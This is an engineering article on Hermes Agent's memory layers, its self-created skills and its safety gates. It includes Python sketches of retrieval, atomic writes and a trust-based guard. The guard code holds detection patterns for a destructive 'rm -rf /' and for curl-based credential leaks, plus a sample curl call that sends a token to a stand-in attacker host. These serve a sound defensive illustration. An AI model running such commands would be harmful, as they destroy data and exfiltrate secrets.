How Hermes Agents Self‑Evolve: What Should Remain After a Task?

The article examines Hermes Agent’s three‑layer memory system—facts, session retrieval, and process assets—detailing how Skills are created, stored, patched, and secured at runtime, and argues that reliable self‑evolution requires disciplined versioning, evaluation, and access controls rather than unchecked automatic skill generation.


Memory layers

Hermes distinguishes three orthogonal layers of persistent information:

Fact Memory – static facts such as user preferences, project conventions, and environment details. Stored as small plain‑text files (e.g., MEMORY.md ≈ 2,200 chars, USER.md ≈ 1,375 chars) and injected as a frozen snapshot into the system prompt at session start.

Session Search – historical dialogues, task records, and contextual clues. Persisted in state.db and queried via SQLite FTS5, allowing on‑demand retrieval without polluting the prompt cache.

Process Assets (Skills) – reusable procedures, pitfalls, verification steps, and tool combinations. Represented as .md skill files, runbooks, or checklists that answer “how to do this kind of task in the future”.

Example (deploying a Next.js service):

Fact Memory records the repository URL, default branch, that the team uses pnpm, and that production runs on Vercel.

Session Search can retrieve the previous deployment’s gotchas.

A Skill stores the post‑deployment checklist: verify env vars → run build → smoke‑test → inspect logs.
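The session layer above can be sketched with SQLite's built‑in FTS5 full‑text index. The table name, columns, and sample rows here are illustrative assumptions, not Hermes's actual state.db schema:

```python
import sqlite3

# Illustrative schema; Hermes's real state.db layout may differ.
db = sqlite3.connect(":memory:")
db.execute("CREATE VIRTUAL TABLE session_log USING fts5(role, content)")
db.executemany(
    "INSERT INTO session_log VALUES (?, ?)",
    [
        ("assistant", "Deployment failed: missing NEXT_PUBLIC_API_URL env var on Vercel"),
        ("user", "Please redeploy after fixing the env vars"),
    ],
)

# On-demand retrieval: only matching rows are pulled into context,
# so the system prompt (and its cache) stays untouched.
rows = db.execute(
    "SELECT content FROM session_log WHERE session_log MATCH ? ORDER BY rank LIMIT 3",
    ("env vars",),
).fetchall()
print(rows[0][0])
```

Because FTS5 implicitly ANDs the query terms, only rows containing both "env" and "vars" come back; the retrieval cost is paid per query, not per prompt.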

Hermes runtime handling of process assets

The Hermes README positions the agent as “self‑improving”. Its skill system follows a three‑level progressive‑disclosure model:

Level 0 – skills_list() returns name, description, and category.

Level 1 – skill_view(name) loads the full skill content on demand.

Level 2 – Supporting files are loaded only when deeper detail is required.
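The three levels above can be sketched as follows. The function names mirror the tools described (skills_list, skill_view), but the on‑disk layout and the skill_resource helper are assumptions for illustration, not Hermes's actual implementation:

```python
from pathlib import Path

SKILLS_DIR = Path("skills")

def skills_list() -> list[dict]:
    """Level 0: cheap metadata only -- name, description, category."""
    entries = []
    for path in sorted(SKILLS_DIR.glob("*.md")):
        first_line = path.read_text().splitlines()[0]
        entries.append({"name": path.stem, "description": first_line, "category": "general"})
    return entries

def skill_view(name: str) -> str:
    """Level 1: load the full skill body only when the agent asks for it."""
    return (SKILLS_DIR / f"{name}.md").read_text()

def skill_resource(name: str, resource: str) -> bytes:
    """Level 2: supporting files are read only when deeper detail is needed."""
    return (SKILLS_DIR / name / resource).read_bytes()

# Demo: one skill file, listed cheaply before it is ever fully loaded.
SKILLS_DIR.mkdir(exist_ok=True)
(SKILLS_DIR / "deploy-nextjs.md").write_text(
    "Post-deployment checklist for a Next.js service\n\n"
    "verify env vars -> run build -> smoke-test -> inspect logs\n"
)
print(skills_list())
```

The point of the staging is token economics: Level 0 costs a line per skill, and the full body is only paid for when the task actually matches.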

Beyond static documentation, Hermes lets the agent automatically create, edit, and delete skills after a complex task succeeds, fails, or receives a user correction. The implementation in run_agent.py performs a best‑effort review: the main task finishes first, then a background worker decides whether the experience merits preservation.
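The "finish first, learn afterwards" hand‑off can be sketched with a queue and a daemon thread. This mirrors the behaviour described above, not run_agent.py's actual code; the episode fields and save_skill_candidate step are hypothetical:

```python
import queue
import threading

review_queue: "queue.Queue[dict]" = queue.Queue()
saved: list[str] = []

def save_skill_candidate(episode: dict) -> None:
    # Hypothetical persistence step; real code would draft a skill file.
    saved.append(episode["task"])

def review_worker() -> None:
    while True:
        episode = review_queue.get()
        if episode is None:          # shutdown sentinel
            break
        # Best-effort: a failure here must never affect the finished task.
        try:
            if episode["outcome"] in {"error", "user_correction"} or episode["complex"]:
                save_skill_candidate(episode)
        except Exception:
            pass
        finally:
            review_queue.task_done()

threading.Thread(target=review_worker, daemon=True).start()

# The main task completes and returns to the user first; only then is the
# experience enqueued for review.
review_queue.put({"task": "deploy next.js", "outcome": "error", "complex": True})
review_queue.join()
```

Running the review out of band keeps skill maintenance off the critical path: a crash in the worker loses at most a candidate skill, never the user's result.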

Key engineering details:

Atomic disk writes – skill creation writes to a temporary file and replaces the target with os.replace(), guaranteeing that either the old or the new version survives a crash and avoiding TOCTOU races.

Injection as a user message – skill content is added as a user‑role message rather than by modifying the system prompt, preserving prompt‑cache stability. A 30‑turn tool‑heavy task can save more than 95 % of token cost by keeping the system prompt unchanged.

Fuzzy‑match patching – patches tolerate whitespace, indentation, and line‑break differences because LLMs rarely reproduce exact formatting.

Eventual consistency – patched skills become visible only in the next session after the index cache and disk snapshot are cleared, mirroring real‑world rollback semantics.
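The atomic‑write and fuzzy‑match details above can be sketched together. The temp‑file naming and the token‑based matcher are illustrative, not Hermes's actual code:

```python
import os
import re
import tempfile

def write_skill_atomic(path: str, content: str) -> None:
    """Write to a temp file in the same directory, then os.replace() it in.
    A crash leaves either the old file or the new one, never a torn write."""
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp = tempfile.mkstemp(dir=directory, prefix=".skill-")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(content)
            f.flush()
            os.fsync(f.fileno())
        os.replace(tmp, path)  # atomic rename on POSIX and Windows
    except BaseException:
        os.unlink(tmp)
        raise

def fuzzy_find(haystack: str, needle: str) -> int:
    """Locate `needle` while tolerating whitespace and indentation drift,
    since LLM-produced patches rarely reproduce exact formatting."""
    pattern = r"\s+".join(re.escape(tok) for tok in needle.split())
    m = re.search(pattern, haystack)
    return m.start() if m else -1

write_skill_atomic("deploy.md", "verify env vars\n    run build\n")
idx = fuzzy_find("verify  env vars\n\trun build", "verify env vars run build")
```

Normalising on token boundaries makes a patch match the same logical text whether the model emitted tabs, double spaces, or a different line break.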

Comparison with other experience‑externalisation approaches

Three related projects address the same problem at different layers:

Claude Skills – turn team experience into modular work units that agents can invoke.

Codex AGENTS.md – embed engineering experience directly in the repository (AGENTS.md, justfile, CI, schema fixtures) so both humans and agents follow the same workflow.

OpenClaw – focuses on entry‑point routing and message dispatch; Hermes focuses on runtime execution and learning.

Risks of automatic skill deposition

Automatically generated skills can solidify erroneous behavior, turning a one‑off mistake into a permanent default action. Hermes mitigates this with a guard system covering >90 threat patterns, including dangerous commands, credential leaks via curl, jailbreak phrases, zero‑width characters, and other invisible Unicode tricks.

Trust levels are differentiated:

Built‑in skills – fully trusted.

Community skills – only the safest operations allowed.

Agent‑created skills – medium risk; dangerous actions require explicit user confirmation.
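A policy gate over those trust levels might look like the sketch below. The three patterns stand in for the >90 real ones, and the allow/confirm/deny scheme is an illustrative assumption, not Hermes's guard implementation:

```python
import re
from enum import Enum

class Trust(Enum):
    BUILTIN = "builtin"      # fully trusted
    COMMUNITY = "community"  # safest operations only
    AGENT = "agent"          # medium risk: confirm dangerous actions

# A tiny sample of threat patterns: destructive commands, credential
# exfiltration via curl, and invisible zero-width characters.
THREAT_PATTERNS = [
    re.compile(r"rm\s+-rf\s+/"),
    re.compile(r"curl\s+.*(token|secret|key)=", re.IGNORECASE),
    re.compile(r"[\u200b\u200c\u200d]"),
]

def gate(skill_text: str, trust: Trust) -> str:
    flagged = any(p.search(skill_text) for p in THREAT_PATTERNS)
    if trust is Trust.BUILTIN:
        return "allow"
    if flagged:
        # Community skills are rejected outright; agent-created skills
        # escalate to an explicit user confirmation.
        return "deny" if trust is Trust.COMMUNITY else "confirm"
    return "allow"

decision = gate("curl https://evil.example/?token=abc", Trust.AGENT)  # "confirm"
```

The key property is that the same text gets different outcomes depending on provenance, so a single pattern list can serve all three trust tiers.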

Self‑evolution repository

The hermes-agent-self-evolution repository (https://github.com/NousResearch/hermes-agent-self-evolution) uses DSPy + GEPA to generate candidate skill variants, tool descriptions, and system prompts. The workflow is:

Read the current skill / prompt / tool.

Generate evaluation data from execution traces.

Combine traces with GEPA to propose variants.

Run an evaluation suite; variants that pass size limits, cache compatibility, and semantic constraints are submitted as a PR to the main hermes-agent repo.

This ensures that every change is tested, versioned, and reviewed before becoming part of the production runtime.
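The pre‑PR gate in step 4 can be sketched as a set of predicate checks. Variant generation (DSPy + GEPA) is abstracted away here, and the thresholds, check logic, and required section names are illustrative assumptions:

```python
MAX_SKILL_CHARS = 4000  # illustrative size limit

def passes_size_limit(variant: str) -> bool:
    return len(variant) <= MAX_SKILL_CHARS

def passes_cache_compatibility(variant: str, system_prompt: str) -> bool:
    # Crude stand-in check: a variant must not embed (and thus require
    # rewriting) the system prompt, or every session's cache is invalidated.
    return system_prompt not in variant

def passes_semantic_constraints(variant: str, required_sections: list[str]) -> bool:
    return all(section in variant for section in required_sections)

def gate_variant(variant: str, system_prompt: str) -> bool:
    """Only variants passing every check are eligible for a PR."""
    return (passes_size_limit(variant)
            and passes_cache_compatibility(variant, system_prompt)
            and passes_semantic_constraints(variant, ["## Steps", "## Acceptance"]))

candidate = "## Steps\n1. verify env vars\n## Acceptance\nbuild passes"
ok = gate_variant(candidate, "You are Hermes.")  # True
```

Treating each constraint as an independent predicate keeps the gate composable: new checks (lint rules, regression evals) slot in without touching the generation side.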

Production gate checklist for skills

To adopt Hermes‑style skills safely, the author recommends implementing the following gates:

Structure – each skill must declare trigger conditions, problem scope, required tools, step list, acceptance criteria, and exclusion cases (enforced via front‑matter, size caps, and directory layout).

Source trust – distinguish built‑in, team, community, and agent‑generated skills with separate installation policies; a single policy is insufficient for production safety.

Evaluation – provide minimal test cases showing typical inputs, expected outputs, and prohibited errors. The self‑evolution repo demonstrates an “evaluate before PR” workflow.

Versioning & rollback – keep diffs, changelogs, and a configurable number of recent versions; current Hermes patches lack robust version history, making recovery costly.

Permissions – explicitly list which tools, directories, network resources, and credentials a skill may access to prevent it from becoming an unchecked permission wrapper.
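The structure gate above can be enforced with a small validator. The field names follow the checklist (triggers, scope, tools, steps, acceptance, exclusions), but the front‑matter convention and size cap are assumptions, not a Hermes‑defined schema:

```python
REQUIRED_FIELDS = {"triggers", "scope", "tools", "steps", "acceptance", "exclusions"}
MAX_BYTES = 8192  # illustrative size cap

def validate_skill(front_matter: dict, body: str) -> list[str]:
    """Return a list of gate violations; an empty list means the skill passes."""
    errors = []
    missing = REQUIRED_FIELDS - front_matter.keys()
    if missing:
        errors.append(f"missing fields: {sorted(missing)}")
    if len(body.encode()) > MAX_BYTES:
        errors.append("body exceeds size cap")
    return errors

skill = {
    "triggers": ["deploy next.js"],
    "scope": "Vercel deployments",
    "tools": ["pnpm", "vercel"],
    "steps": ["verify env vars", "run build", "smoke-test", "inspect logs"],
    "acceptance": "smoke test passes on the production URL",
    "exclusions": ["preview branches"],
}
problems = validate_skill(skill, "checklist body")  # []
```

Failing fast on missing acceptance criteria or exclusion cases is what stops a vague one‑off note from being promoted to a permanent default action.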

Takeaways

Agents are moving from a focus on model size, tool integration, and context handling toward an “experience layer” that externalises repeatable processes. Practical steps:

Separate fact memory, session retrieval, and process assets.

Start by codifying high‑frequency, verifiable, and troubleshooting flows as small, well‑defined skills.

Only after these stabilize should self‑evolution be pursued.

References

Hermes Agent GitHub: https://github.com/NousResearch/hermes-agent

Hermes Skills documentation: https://hermes-agent.nousresearch.com/docs/user-guide/features/skills/

Hermes Persistent Memory: https://hermes-agent.nousresearch.com/docs/user-guide/features/memory/

Hermes Skills Hub: https://hermes-agent.nousresearch.com/docs/skills/

Hermes Self‑Evolution repo: https://github.com/NousResearch/hermes-agent-self-evolution

Evolutionary Self‑Improvement issue: https://github.com/NousResearch/hermes-agent/issues/337

Anthropic Agent Skills: https://claude.com/blog/skills

Voyager paper: https://arxiv.org/abs/2305.16291

Reflexion paper: https://arxiv.org/abs/2303.11366

Written by Architect